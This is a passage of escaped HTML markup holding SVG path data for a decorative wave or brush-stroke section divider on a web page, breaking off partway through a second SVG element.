d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path 